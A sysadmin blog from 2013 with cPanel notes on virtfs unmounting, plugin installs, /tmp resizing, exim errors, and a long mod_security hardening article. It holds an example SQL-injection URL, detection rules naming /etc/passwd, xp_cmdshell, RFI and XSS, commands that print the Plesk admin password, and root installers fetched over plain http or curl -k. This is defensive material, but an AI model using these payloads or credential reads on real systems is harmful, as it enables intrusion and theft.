Monday, March 25, 2013

Cpanel : JailShell : Virtfs Unmount

If you are the sysadmin of a cPanel server, you might be aware of the JailShell. It is nothing but a user shell with limited privileges. Users who request shell access to the web hosting server are given this shell instead of bash (which provides root-level privileges to users).

JailShell limits the user's access to their home directory and keeps the rest of the file system out of reach. There is still a chance that such users break into your system, so be careful about whom you grant shell access to. When a user logs in via SSH, JailShell mounts that user's file system under a directory called /home/virtfs. This contains the user's home directory and a false file system that links back to system directories such as /bin, /usr and so on.

NOTE: Be careful! NEVER remove any folder inside /home/virtfs. As I said earlier, this folder links back to your system's root file system. You might end up wrecking your server if you attempt it.

So, we now know that JailShell provides restricted shell access to users and temporarily mounts the home directory under /home/virtfs.

Now, what if you still see the directories of different users mounted under /home/virtfs?

Right, this normally happens when users do not log out of their SSH sessions properly. As the system admin, you are responsible for unmounting these directories safely.

How do I do that?

You can find all the virtfs mounts in /proc/mounts. Run cat /proc/mounts (or grep /home/virtfs /proc/mounts to see only the jail mounts).

Now it's time to unmount them one by one. For that you have to take the second column of the output (the mount point). Or write a simple for loop as follows:
for i in $(grep /home/virtfs /proc/mounts | cut -d ' ' -f 2); do umount "$i"; done

If you want to unmount the virtfs of a particular user, simply add another grep for the username to the pipeline.

Now, you’re done with cleaning of your virtfs.
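The loop above unmounts every virtfs mount on the box at once. The script below is an added example (not code from the original post) that does the same job per user: it reads /proc/mounts, selects only the mount points under /home/virtfs/USER, and unmounts them deepest first so that nested bind mounts come off before their parents. It also refuses to touch a user who still has a login session, which is the situation the note above warns about. The /proc/mounts lines embedded in it are constructed for offline use; the helper names (write_sample_mounts, virtfs_mounts, virtfs_unmount) and the DRY_RUN variable are my own.

```shell
#!/bin/sh
# Added example, not code from the original post: per-user virtfs cleanup.

# Constructed /proc/mounts sample. Real /proc/mounts escapes spaces in paths
# as \040, so splitting on whitespace (awk's default) is safe.
SAMPLE_MOUNTS='/dev/sda1 / ext4 rw,relatime 0 0
/usr/bin /home/virtfs/alice/usr/bin none rw,bind 0 0
/usr/lib /home/virtfs/alice/usr/lib none rw,bind 0 0
proc /home/virtfs/alice/proc proc rw,nosuid,nodev,noexec 0 0
/usr/bin /home/virtfs/bob/usr/bin none rw,bind 0 0
tmpfs /home/virtfs/bobby/tmp tmpfs rw,nosuid,nodev 0 0'

# write_sample_mounts: write the sample to a temp file and print its path, so
# the functions below can be exercised without touching the real system.
write_sample_mounts() {
    f=$(mktemp)
    printf '%s\n' "$SAMPLE_MOUNTS" > "$f"
    printf '%s\n' "$f"
}

# virtfs_mounts USER [MOUNTS_FILE]
# Print the mount points under /home/virtfs/USER (and that directory itself
# if it is a mount), deepest first. Matching on "root/" keeps "bob" from also
# matching "bobby". Defaults to the live /proc/mounts.
virtfs_mounts() {
    user=$1
    file=${2:-/proc/mounts}
    awk -v root="/home/virtfs/$user" '
        $2 == root || index($2, root "/") == 1 { print $2 }
    ' "$file" | sort -r
}

# virtfs_unmount USER [MOUNTS_FILE]
# Unmount each mount point reported by virtfs_mounts. With DRY_RUN=1 it only
# prints what it would do. Skips the user if they still have a login session.
virtfs_unmount() {
    user=$1
    file=${2:-/proc/mounts}
    if who | awk '{ print $1 }' | grep -qx "$user"; then
        echo "$user is still logged in, skipping" >&2
        return 1
    fi
    virtfs_mounts "$user" "$file" | while IFS= read -r mp; do
        if [ "${DRY_RUN:-0}" = 1 ]; then
            echo "would umount $mp"
        else
            umount "$mp" || echo "umount failed for $mp" >&2
        fi
    done
}

# Stand-alone demonstration against the constructed sample (dry run only).
demo=$(write_sample_mounts)
DRY_RUN=1 virtfs_unmount alice "$demo"
rm -f "$demo"
```

On a live server, run it as `DRY_RUN=1 virtfs_unmount username` first and compare the list with grep /home/virtfs/username /proc/mounts before doing the real unmount.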

Installing Google Apps, ConfigServer Explorer (cse), WHMPHP, CloudFlare, Attracta SEO, CageFS and ConfigServer Mail Queue (cmq)

http://gaw.gk-root.com/
http://configserver.com/cp/cse.html
http://www.whmphp.com/installation.php
http://www.cloudflare.com/resources-downloads
http://www.attractaseo.com/partner_kit/plugin.html
http://docs.cloudlinux.com/index.html?installation2.html
http://configserver.com/cp/cmq.html


cd /usr/local/src/
ls
wget http://www.configserver.com/free/cse.tgz
ls
tar -xzf cse.tgz
ls
cd cse
sh install.sh
cd ..
rm -Rfv cse/ cse.tgz
ls
locate config server
ls

================

yum install cagefs
/usr/sbin/cagefsctl --init
ls
mkdir /home/cagefs-skeleton
ln -s /home/cagefs-skeleton /usr/share/cagefs-skeleton
cd /home/
ls
cd cagefs-skeleton/
ls

=================
cd /usr/local/src/
wget http://whmphp.com/download/install.sh;
ls
sh install.sh

=================
cd /usr/local/cpanel
curl -k -L https://github.com/cloudflare/CloudFlare-CPanel/tarball/master > cloudflare.tar.gz
ls
tar -zxvf cloudflare.tar.gz
ls
cd cloudflare-CloudFlare-CPanel-UNIQUE ID/cloudflare/
cd cloudflare-CloudFlare-CPanel-1a7b202/
ls
cd cloudflare/
ls

================
cd /usr/local/src/
ls
wget http://google-apps-wizard-cpanel-plugin.googlecode.com/files/gaw-2.0.tar
ls
tar -xf gaw-2.0.tar
cd gaw-2.0
./gawupdate.sh

================
cd ..
ll
wget http://configserver.com/free/cmq.tgz
ll
tar -xzf cmq.tgz
cd cmq
ll
sh install.sh
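Every installer above is fetched over plain http, or with curl -k (certificate checking switched off), and then run as root with sh install.sh. The helper below is an added example, not part of these notes or of any vendor's installer: it downloads over HTTPS with verification left on, compares the archive's SHA-256 against a digest obtained from the vendor out of band, and only then unpacks and runs the installer. The function names, the placeholder URL and digest, and the archive layout it assumes (a top-level directory containing install.sh, as cse.tgz and cmq.tgz have) are my own.

```shell
#!/bin/sh
# Added example, not from the original notes: verified download of an installer.

# sha256_of FILE: print the hex SHA-256, using whichever tool is available.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    else
        shasum -a 256 "$1" | awk '{ print $1 }'
    fi
}

# verify_sha256 FILE EXPECTED: 0 when the digest matches, 1 otherwise.
verify_sha256() {
    actual=$(sha256_of "$1")
    [ "$actual" = "$2" ]
}

# fetch_verified URL EXPECTED_SHA256 DEST
# Download with TLS verification on (no -k), follow redirects, refuse
# anything but https, and fail on HTTP errors so an error page is never saved
# under the installer's name. On a digest mismatch the file is removed.
fetch_verified() {
    url=$1; expected=$2; dest=$3
    curl --fail --silent --show-error --location --proto '=https' \
         -o "$dest" "$url" || return 1
    if verify_sha256 "$dest" "$expected"; then
        return 0
    fi
    echo "checksum mismatch for $dest, removing it" >&2
    rm -f "$dest"
    return 1
}

# install_verified URL EXPECTED_SHA256 TOPDIR
# The page's pattern (wget; tar -xzf; sh install.sh) with verification first.
# TOPDIR is the directory the archive extracts to (e.g. cse or cmq).
install_verified() {
    url=$1; expected=$2; topdir=$3
    workdir=$(mktemp -d) || return 1
    fetch_verified "$url" "$expected" "$workdir/installer.tgz" || return 1
    tar -xzf "$workdir/installer.tgz" -C "$workdir" || return 1
    (cd "$workdir/$topdir" && sh ./install.sh)
}

# Usage (placeholders, not real values):
# install_verified "https://vendor.example/cse.tgz" "<sha256 published by the vendor>" cse
```

The digest has to come from somewhere other than the download itself (a signed release note, a vendor page fetched over a separate TLS session); a checksum served next to the file only protects against a corrupted transfer.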

Increase Size of /tmp (/usr/tmpDSK) Partition in Linux

service httpd stop
service mysql stop
pstree -p | grep tailwatchd
umount /var/tmp
umount -l /tmp
dd if=/dev/zero of=/usr/tmpDSK bs=1024k count=2048
du -sch /usr/tmpDSK
mkfs -t ext3 /usr/tmpDSK
file /usr/tmpDSK
mount -o loop,noexec,nosuid,rw /usr/tmpDSK /tmp
install -d --mode=1777 /tmp
mount -o bind,rw,noexec,nosuid /tmp /var/tmp
service httpd start
service mysql start

 

rm -f /usr/tmpDSK
dd if=/dev/zero of=/home/tmpDSK bs=1024 count=8192000
mkfs.ext3 /home/tmpDSK
mount -o loop,rw,noexec,nosuid /home/tmpDSK /tmp
mount -o bind,rw,noexec,nosuid /tmp /var/tmp
chmod 1777 /tmp
cp -Rp /tmp_backup/* /tmp/
rm -rf /tmp_backup
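Both recipes above mount /tmp and /var/tmp with noexec,nosuid, which is the main point of using a separate tmpDSK image. The check below is an added example, not from the original post: it reads the mount table and reports which of a required set of options are missing for a given mount point, so the result of the procedure can be verified (or monitored from cron) rather than assumed. The embedded mount table is constructed; mount_missing_opts, tmp_hardening_ok and their arguments are my own.

```shell
#!/bin/sh
# Added example, not code from the original post: verify /tmp mount options.

# Constructed mount table in /proc/mounts format: /tmp is correct, /var/tmp
# was re-bound without noexec.
SAMPLE_MOUNT_TABLE='/dev/sda1 / ext4 rw,relatime 0 0
/usr/tmpDSK /tmp ext3 rw,nosuid,noexec,relatime 0 0
/usr/tmpDSK /var/tmp ext3 rw,nosuid,relatime 0 0'

# mount_missing_opts MOUNTPOINT REQUIRED_OPTS [MOUNTS_FILE]
# REQUIRED_OPTS is comma separated (e.g. noexec,nosuid). Prints the required
# options absent from the mount point's option list, one per line; prints
# nothing when all are present. Returns 1 if the path is not mounted at all.
# Defaults to the live /proc/mounts.
mount_missing_opts() {
    mp=$1
    required=$2
    file=${3:-/proc/mounts}
    # Column 4 holds the options; keep the last matching line, since a later
    # mount on the same path shadows an earlier one.
    opts=$(awk -v mp="$mp" '$2 == mp { o = $4 } END { print o }' "$file")
    [ -n "$opts" ] || return 1
    printf '%s\n' "$required" | tr ',' '\n' | while IFS= read -r want; do
        case ",$opts," in
            *",$want,"*) ;;
            *) printf '%s\n' "$want" ;;
        esac
    done
}

# tmp_hardening_ok [MOUNTS_FILE]
# 0 when both /tmp and /var/tmp are mounted with noexec and nosuid.
tmp_hardening_ok() {
    file=${1:-/proc/mounts}
    for mp in /tmp /var/tmp; do
        missing=$(mount_missing_opts "$mp" noexec,nosuid "$file") || return 1
        [ -z "$missing" ] || return 1
    done
    return 0
}

# Stand-alone demonstration against the constructed table.
demo=$(mktemp)
printf '%s\n' "$SAMPLE_MOUNT_TABLE" > "$demo"
for mp in /tmp /var/tmp; do
    echo "$mp missing: $(mount_missing_opts "$mp" noexec,nosuid "$demo" | tr '\n' ' ')"
done
rm -f "$demo"
```

Run tmp_hardening_ok with no argument on the live box after the procedure; a non-zero exit is the signal that one of the two mounts was re-done without the hardening options.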

 

Saturday, March 23, 2013

How to Install Softaculous on VPS or Dedicated Server with cPanel/WHM?

Step one: cd /usr/local/cpanel/whostmgr/docroot/cgi
Step two: wget -N http://www.softaculous.com/ins/addon_softaculous.php

Step three: chmod 755 addon_softaculous.php
Now go to : WHM > Plugins > Softaculous - Instant Installs and there you go

Friday, March 22, 2013

T=remote_smtp defer (-53): retry time not reached for any host

First check your logs:

cd /var/log

then grep the affected address in exim_mainlog (grep <email address> exim_mainlog).

You will see the error there.

Then try the commands below to fix the problem.

This can be caused by multiple things, however if it happens for each email, it’s likely your exim databases are corrupt; to resolve this you should:

/usr/sbin/exim_tidydb -t 1d /var/spool/exim retry > /dev/null
/usr/sbin/exim_tidydb -t 1d /var/spool/exim reject > /dev/null
/usr/sbin/exim_tidydb -t 1d /var/spool/exim wait-remote_smtp > /dev/null

/scripts/courierup --force
/scripts/eximup --force

If you did that, yet the problem persists, you can either seek professional help, or contact the cPanel support.

References

http://forums.cpanel.net/f43/t-remote_smtp-defer-53-retry-time-not-reached-any-host-72383.html

OR use the solution below.

To solve this issue, you need to:

  1. Log in to http://gmail.com with the account you use with exim4. It will ask you to log in a second time with a captcha; do so.

  2. Log in on all of your machines that use this technique and issue the following command: sudo exim -qff


References

http://blog.mansonthomas.com/2009/04/send-mail-through-gmail-smtp-server.html

 

Your ISP is likely blocking your connection via port 25:

[19:25:19 ns313489 root@4396451 ~]cPs# telnet mx1.cpanel.net 25
Trying 208.74.121.68...
telnet: connect to address 208.74.121.68: Connection timed out
[19:34:17 ns313489 root@4396451 ~]cPs# telnet mx2.cpanel.net 25
Trying 208.74.125.122...

[19:40:18 ns313489 root@4396451 ~]cPs# telnet mx1.hotmail.com 25
Trying 65.55.37.120...
telnet: connect to address 65.55.37.120: Connection timed out
Trying 65.55.92.152...
telnet: connect to address 65.55.92.152: Connection timed out


Whereas, it would normally work as such:

~ » telnet mx1.cpanel.net 25
Trying 208.74.121.68...
Connected to mx1.cpanel.net.
Escape character is '^]'.
220-mx1.cpanel.net ESMTP Exim 4.82 #2 Fri, 15 Nov 2013 12:33:33 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
^]
telnet> quit
Connection closed.

~ » telnet mx1.hotmail.com 25
Trying 65.54.188.94...
Connected to mx1.hotmail.com.
Escape character is '^]'.
220 BAY0-MC2-F9.Bay0.hotmail.com Sending unsolicited commercial or bulk e-mail to Microsoft's computer network is prohibited. Other restrictions are found athttp://privacy.microsoft.com/en-us/anti-spam.mspx. Fri, 15 Nov 2013 10:47:53 -0800
^]
telnet> quit
Connection closed.

I would suggest contacting your provider to see if they have any restrictions on port 25.

Plesk password

On a Plesk server (Windows), we can get the admin password by running the following command at the server's command prompt:

==
"%plesk_bin%\plesksrvclient" -get
==

On a Linux server, the password is stored in /etc/psa/.psa.shadow (cat /etc/psa/.psa.shadow), or use /usr/local/psa/bin/admin --show-password.

For more information, please refer:

http://kb.parallels.com/en/473
http://kb.parallels.com/en/387

Mod Security Rules

Configuration


The basic modsecurity.conf looks like the following code:

<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine On
# The audit engine works independently and can be turned
# On or Off on a per-server or per-directory basis
SecAuditEngine RelevantOnly
# Make sure that URL encoding is valid
SecFilterCheckURLEncoding On
# Unicode encoding check
SecFilterCheckUnicodeEncoding On
# Only allow bytes from this range
SecFilterForceByteRange 1 255
# Cookie format checks.
SecFilterCheckCookieFormat On
# The name of the audit log file
SecAuditLog logs/audit_log
# Should mod_security inspect POST payloads
SecFilterScanPOST On
# Default action set
SecFilterDefaultAction "deny,log,status:500"
</IfModule>

Now, let’s look at some basic configuration directives:

  • SecFilterEngine: When set to On (that is, SecFilterEngine On), it starts monitoring requests. It is Off (disabled) by default.

  • SecFilterScanPOST: When On, enables scanning the request body/POST payload.

  • SecFilterScanOutput: When On, enables scanning the response body also.


Similarly, to check URL encoding, you can use SecFilterCheckURLEncoding; to control request body buffering, use SecRequestBodyAccess; to control what happens once the response body limit is reached, use SecResponseBodyLimitAction; and to specify the response body buffering limit, use SecResponseBodyLimit.

The full list of configuration directives, with their usage and syntax, is available on modsecurity.org.

Rules — the basics


The mod_security rule engine is where gathered data is checked for any malicious or particular content. Rules are directives in the configuration file that decide what to do with the data parsed by the configuration directives. The rule language is a vast topic; we’ll only discuss basic rule-writing syntax, and rule directives to secure Web applications from all the attacks we’ve discussed so far.

The main directive used to create rules is SecRule, whose syntax is as follows:

SecRule VARIABLES OPERATOR [ACTIONS]

  • VARIABLES: Specify which places to check in an HTTP transaction. mod_security preprocesses raw transaction data, making it easy for rules to focus on the logic of detection. Currently, variables are divided into request, server and response variables, parsing flags and time variables. You can use multiple variables in a single rule with the | operator.

  • OPERATORS: Specify a regular expression, pattern or keyword to be checked in the variable(s). There are four types of operators: string-matching, numerical, validation and miscellaneous operators. Operators always begin with a @ character, and are always followed by a space.

  • ACTIONS: Specify what to do if the rule evaluates to "true": step on to another rule, display an error message, or any other task. Actions are divided into seven categories: disruptive, flow, metadata, variable, logging, special and miscellaneous actions.


Here is a simple example of a rule:

SecRule ARGS|REQUEST_HEADERS "@rx <script" "id:101,msg:'XSS Attack',severity:ERROR,deny,status:404"

Here, ARGS and REQUEST_HEADERS are variables (request parameters and request headers, respectively); @rx is the operator used to match a pattern in the variables (here, the pattern is <script); id, msg, severity, deny and status are all actions to be performed if the pattern is matched. This rule is used to avoid XSS attacks by checking for a <script pattern in the request parameters and headers, and generates an 'XSS Attack' message. The rule is given id:101; it will deny any matching request with a 404 status response.

Let's look at another example, for more clarity:

SecRule ARGS:username "@streq admin" chain,deny
SecRule REMOTE_ADDR "!@streq 192.168.1.1"

This is an example of chaining two rules, and of transferring control to another rule if the first rule holds true. The first rule checks for the string admin in the request's username parameter. If it is found, the second rule is activated, which denies all such requests that are not from the 192.168.1.1 IP address. Thus, chaining rules helps to create complex rules.

Now, writing filtering rules for each attack will be very cumbersome, and also prone to human error. Here, mod_security provides users with another directive, SecFilter. This looks for a keyword in the request. It will be applied to the first line of the request (the one that looks like GET /index.php?parameter=value HTTP/1.0). In case of POST requests, the body of the request will be searched too (provided request body buffering is enabled). All pattern matches are case-insensitive, by default. The syntax for SecFilter is SecFilter KEYWORD.

Rules against major attacks


Let’s look at some rules to prevent major attacks on Web applications.

SQL injection


Suppose you have an application that is vulnerable to SQL-injection attacks. An attacker could try to delete all records from a MySQL table, like this:

http://www.example.com/login.php?user=arpit';DELETE%20FROM%20users--

This can be prevented with the following directive:

SecFilter "delete[[:space:]]+from"

Whenever such a request is caught by the filter, something similar to the following code is logged to audit_log:

========================================
Request: 192.168.0.207 - - [04/Jul/2006:23:43:00 +1200] "GET /login.php?user=tom';DELETE%20FROM%20users-- HTTP/1.1" 500 1215
Handler: (null)
----------------------------------------
GET /login.php?user=arpit';DELETE%20FROM%20users-- HTTP/1.1
Host: 192.168.0.100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
mod_security-message: Access denied with code 500. Pattern match "delete[[:space:]]+from" at THE_REQUEST
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Last-Modified: Fri, 21 Oct 2005 14:30:18 GMT
ETag: "8238-4bf-833a5280"
Accept-Ranges: bytes
Content-Length: 1215
Connection: close
Content-Type: text/html

In response to the attack, SecFilterDefaultAction is applied (the request is denied, logged, and the attacker gets a 500 error). If you want a different action to take place (for example, redirecting the request to an HTML page that provides customised warning content), you can specify this in the rule, as follows:

SecFilter "delete[[:space:]]+from" log,redirect:http://example.com/invalid_request.html

To prevent more SQL injection attacks, we can add a few other directives like:

SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"
SecFilter "drop[[:space:]]table"
SecFilter "create[[:space:]]+table"
SecFilter "update.+set.+="
SecFilter "union.+select"
SecFilter "or.+1[[:space:]]*=[[:space:]]*1"
SecFilter "'.+--"
SecFilter "xp_enumdsn"
SecFilter "xp_cmdshell"
SecFilter "xp_regread"
SecFilter "xp_regwrite"
SecFilter "xp_regdeletekey"

The last five are specific to MS SQL Server injection attacks.

The only problem with SecFilter is that it scans the whole request instead of particular fields. Here, SecFilterSelective is useful; it allows you to choose exactly what to search. The syntax is:

SecFilterSelective LOCATION KEYWORD [ACTIONS]

Here, LOCATION decides which area of the request is to be filtered. Hence, for SQL injection, you can also use:

SecFilterSelective SCRIPT_FILENAME "login.php" chain
SecFilterSelective ARG_user "!^[a-zA-Z0-9\.@!]{1,10}$"

The above code will validate the user parameter, and allow only the white-list of characters we have given. If for some reason you cannot take this approach, and must use a deny-what-is-bad method, then at least remove single quotes ('), semicolons (;), dashes and hyphens (-), and parentheses (( )).

XSS attacks


For XSS attacks, we can use the following directives:

SecFilter "<(.|\n)+>"
SecFilter "<[[:space:]]*script"
SecFilter "<script"
SecFilter "<.+>"

And also some additional filters like:

SecFilterSelective THE_REQUEST "<[^>]*meta*\"?[^>]*>"
SecFilterSelective THE_REQUEST "<[^>]*style*\"?[^>]*>"
SecFilterSelective THE_REQUEST "<[^>]*script*\"?[^>]*>"
SecFilterSelective THE_REQUEST "<[^>]*iframe*\"?[^>]*>"
SecFilterSelective THE_REQUEST "<[^>]*object*\"?[^>]*>"
SecFilterSelective THE_REQUEST "<[^>]*img*\"?[^>]*>"
SecFilterSelective THE_REQUEST "<[^>]*applet*\"?[^>]*>"
SecFilterSelective THE_REQUEST "<[^>]*form*\"?[^>]*>"

Though these filters will detect a large number of XSS attacks, they are not foolproof. Due to the multitude of different scripting languages, it is possible for an attacker to create many different methods for implementing an XSS attack that would bypass these filters. Hence, here it is advised that you also keep on adding your own filters.

To protect against an XSS attack done via PHP session cookies, you can use the following:

SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

Command execution attacks


For command execution attacks, you can use the following directives:

SecFilter /etc/passwd
SecFilter /bin/ls

Here, the attacker may try to use a string like /bin/./sh to bypass the filter, but mod_security automatically reduces /./ to / and // to /, and also decodes URL-encoded characters. You can also use the white-list approach:

SecFilterSelective SCRIPT_FILENAME "directory.php" chain
SecFilterSelective ARG_dir "!^[a-zA-Z0-9/_.-]+$"

This chained rule-set will only allow letters, numbers, underscore, dash, forward slash, and period in the dir parameter. Filtering out command directory names is also a good option, and can be done as follows:

SecFilterSelective THE_REQUEST "/(etc|bin|sbin|tmp|var|opt|dev|kernel)/"
SecFilterSelective ARGS "bin/"
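The SQL-injection filters above, the allow-list for the user parameter, and the note in this section that mod_security reduces /./ and // and decodes URL encoding before matching can all be tried out offline. The script below is an added example, not code from the article or from mod_security itself: it models the 1.x SecFilter matching step as a URL-decode and path-normalisation pass followed by a case-insensitive extended-regex match (grep -E -i, which accepts the POSIX [[:space:]] classes the filters use), and runs the article's own patterns against constructed request lines. The function names, the request lines, and the simplification of normalising the whole request line rather than each variable separately are my own.

```shell
#!/bin/sh
# Added example, not from the article: a small model of how mod_security 1.x
# evaluates SecFilter patterns, showing why the normalisation step matters.

# modsec_normalize STRING
# Decode %XX sequences, then reduce /./ to / and // to /, as the article
# describes. Real mod_security applies this per variable; here it is applied
# to the whole request line for simplicity.
modsec_normalize() {
    printf '%s' "$1" | awk '
        BEGIN { for (i = 1; i < 256; i++) hex[sprintf("%02x", i)] = sprintf("%c", i) }
        {
            out = ""; s = $0
            while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
                out = out substr(s, 1, RSTART - 1) hex[tolower(substr(s, RSTART + 1, 2))]
                s = substr(s, RSTART + 3)
            }
            s = out s
            while (gsub(/\/\.\//, "/", s)) { }
            gsub(/\/\/+/, "/", s)
            print s
        }'
}

# secfilter_matches PATTERN REQUEST
# 0 if a SecFilter with PATTERN would fire on REQUEST. SecFilter patterns are
# extended regular expressions matched case-insensitively by default.
secfilter_matches() {
    modsec_normalize "$2" | grep -E -i -q -- "$1"
}

# arg_whitelist_ok VALUE
# The article's allow-list for the user parameter, "!^[a-zA-Z0-9\.@!]{1,10}$",
# seen from the accepting side: 0 when VALUE would be let through.
arg_whitelist_ok() {
    printf '%s\n' "$1" | grep -E -q '^[a-zA-Z0-9.@!]{1,10}$'
}

# Constructed request lines for the demonstration.
SQLI_REQ="GET /login.php?user=arpit';DELETE%20FROM%20users-- HTTP/1.1"
CMD_REQ="GET /directory.php?dir=/bin/.//ls HTTP/1.1"
XSS_REQ="GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1"
CLEAN_REQ="GET /index.php?page=about HTTP/1.1"

# Stand-alone demonstration: which of three article patterns fire on each line.
for req in "$SQLI_REQ" "$CMD_REQ" "$XSS_REQ" "$CLEAN_REQ"; do
    for pat in 'delete[[:space:]]+from' '/bin/ls' '<script'; do
        if secfilter_matches "$pat" "$req"; then
            echo "DENY [$pat] $req"
        fi
    done
done
```

Two things the run makes visible: the raw request line "DELETE%20FROM" never matches delete[[:space:]]+from until %20 is decoded, and /bin/.//ls only matches /bin/ls after the path is collapsed, which is exactly the bypass the article says the engine closes.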




Session fixation


During session fixation, in one of its phases, the attacker needs to somehow inject the desired session ID into the victim's browser. We can mitigate these issues by implementing the following:

# Weaker XSS protection, but allows common HTML tags
SecFilter "<[[:space:]]*script"
# Prevent XSS attacks (HTML/Javascript injection)
SecFilter "<.+>"
# Block passing Cookie/Session IDs in the URL
SecFilterSelective THE_REQUEST "(document\.cookie|Set-Cookie|SessionID=)"

Directory traversal attacks


For path/directory traversal attacks, the following directives are mostly used:

SecFilter "\.\./"
SecFilterSelective SCRIPT_FILENAME "/scripts/foo.cgi" chain
SecFilterSelective ARG_home "!^[a-zA-Z].{15,}\.txt"

The last two filters are chained, and will reject any value of the home argument that does not have the form of a filename beginning with a letter, followed by at least 15 further characters and a .txt extension.

Similarly, you can also prevent predictable resource location attacks, and protect against sensitive file misuse, with two recommended solutions. First, remove files that are not intended for public viewing from all Web server-accessible directories. After this, you can create security filters to identify whether someone probes for these files:

SecFilterSelective REQUEST_URI "^/(scripts|cgi-local|htbin|cgibin|cgis|win-cgi|cgi-win|bin)/"
SecFilterSelective REQUEST_URI ".*\.(bak|old|orig|backup|c)$"

These two filters will deny access to both unused but commonly scanned-for directories, and files with common backup extensions.

Web pages that are dynamically created by the directory-indexing function will have a title that starts with "Index of /". We can use this as a signature, and add the following directives to catch and deny access to this data:

SecFilterScanOutput On
SecFilterSelective OUTPUT "\<title\>Index of /"

Information leakage


Here, we are introduced to the OUTPUT filtering capabilities of mod_security, which you should enable by adding SecFilterScanOutput On in the configuration file. We can easily set up a filter to watch for common database error messages being sent to the client, and then generate a generic 500 status code instead of the verbose message:

SecFilterScanOutput On
SecFilterSelective OUTPUT "An Error Has Occurred" status:500
SecFilterSelective OUTPUT "Fatal error:"

Output filtering can also be used to detect successful intrusions. These rules will monitor output, and detect typical keywords resulting from a command execution on the server:

SecFilterSelective OUTPUT "Volume Serial Number"
SecFilterSelective OUTPUT "Command completed"
SecFilterSelective OUTPUT "Bad command or filename"
SecFilterSelective OUTPUT "file(s) copied"
SecFilterSelective OUTPUT "Index of /cgi-bin/"
SecFilterSelective OUTPUT ".*uid\=\("

Secure file uploads


mod_security is capable of intercepting files uploaded through POST requests with multipart/form-data encoding, and through PUT requests. It will always store uploaded files in a temporary directory first. You can choose the directory using the SecUploadDir directive:

SecUploadDir /tmp

It is better to choose a private directory for file storage, somewhere that only the Web server user account is allowed to access. Otherwise, other server users may be able to read files uploaded through the Web server. You can choose to execute an external script to verify a file before it is allowed to go through to the application. The SecUploadApproveScript directive enables this, as in the following example:

SecUploadApproveScript /usr/local/apache/bin/upload_verify.pl

RFI attacks


RFI attacks are generally easy to detect, with something like the following directives:

SecRule ARGS "@rx (?i)^(f|ht)tps?://([^/])" "msg:'Remote File Inclusion attack'"
# To detect inclusions containing an IP address
SecRule ARGS "@rx (ht|f)tps?://([01]?\d\d?|2[0-4]\d|25[0-5])\.([01]?\d\d?|2[0-4]\d|25[0-5])\.([01]?\d\d?|2[0-4]\d|25[0-5])\.([01]?\d\d?|2[0-4]\d|25[0-5])" "msg:'Remote File Inclusion attack'"
# To detect inclusions containing the PHP function include()
SecRule ARGS "@rx \binclude\s*\([\w|\s]*(ht|f)tps?://" "msg:'Remote File Inclusion'"
# To detect an inclusion ending with '?'
SecRule ARGS "@rx (ft|htt)ps?.*\?+$" "msg:'Remote File Inclusion'"

Miscellaneous security features


You can also block IP addresses with the following directive (the dots are escaped so that the pattern matches only that address):

SecFilterSelective "REMOTE_ADDR" "^192\.168\.1\.1$"

If you have an input field named url in your comment form, and you want to scan the value of url for the string c99, you do it as follows:

SecFilterSelective "ARG_url" "c99"

The following configuration helps fight HTTP fingerprinting, and accepts only valid protocol versions:

SecFilterSelective SERVER_PROTOCOL "!^HTTP/(0\.9|1\.0|1\.1)$"

The following configuration allows supported request methods only, and helps fight XST attacks:

SecFilterSelective REQUEST_METHOD "!^(GET|HEAD|POST)$"

Often during the reconnaissance phase, attackers look for the Web server identity and version. Web servers typically send their identity with every HTTP response, in the Server header. Apache is particularly helpful here; it not only sends its name and full version by default, but also allows server modules to append their versions. Here, you can confuse the attackers by using something like:

SecServerSignature "Microsoft-IIS/5.0"

PHP code cannot be injected directly, but it may be possible to have code recorded on disk to be executed later, using an LFI attack. The following rule will detect such an injection attempt, but will ignore XML documents, which use similar syntax:

SecRule ARGS "@rx <\?(?!xml)"

Logging


There are three places where, depending on the configuration, you may find mod_security logging information:

  • mod_security debug log: If enabled via the SecFilterDebugLevel and SecFilterDebugLog directives, it contains a large number of entries for every request processed. Each log entry is associated with a log level, which is a number from 0 (no messages at all) to 4 (maximum logging). You normally keep the debug log level at 0, and increase it only when you are debugging your rule set.

  • Apache error log: Some of the messages from the debug log will make it into the Apache error log (even if you set the mod_security debug log level to 0). These are the messages that require an administrator's attention, such as information about requests being rejected.

  • mod_security audit log: When audit logging is enabled (using the SecAuditEngine and SecAuditLog directives), mod_security can record each request (and its body, provided request body buffering is enabled) and the corresponding response headers.


Here is an example of an error message resulting from invalid content discovered in a cookie:

[Tue Jun 26 17:44:36 2011] [error] [client 127.0.0.1]
mod_security: Access denied with code 500. Pattern match "!(^$|^[a-zA-Z0-9]+$)"
at COOKIES_VALUES(sessionid) [hostname "127.0.0.1"]
[uri "/test.php"] [unique_id 3434fvnij54jktynv45fC8QQQQAB]

The message indicates that the request was rejected ("Access denied") with an HTTP 500 response because the content of the cookie sessionid matched the pattern !(^$|^[a-zA-Z0-9]+$). (The pattern allows a cookie to be empty, but if it is not, it must consist only of one or more letters and digits.)

Note: I once again stress that neither LFY nor myself are responsible for the misuse of the information given here. Any attack techniques described here are meant to give you the knowledge that you need to protect your own infrastructure. Please use the tools and techniques sensibly.

This article has just scratched the surface of mod_security. For more details on rule writing and other important directives, please refer to ModSecurity Handbook by Ivan Ristic — a must-read book for anyone interested in this topic.

We will deal with other ways to secure Apache in the next article. Always remember: Know hacking, but no hacking.

Script to change the name servers server-wide.

ls /var/named/ | grep '\.db$' > account
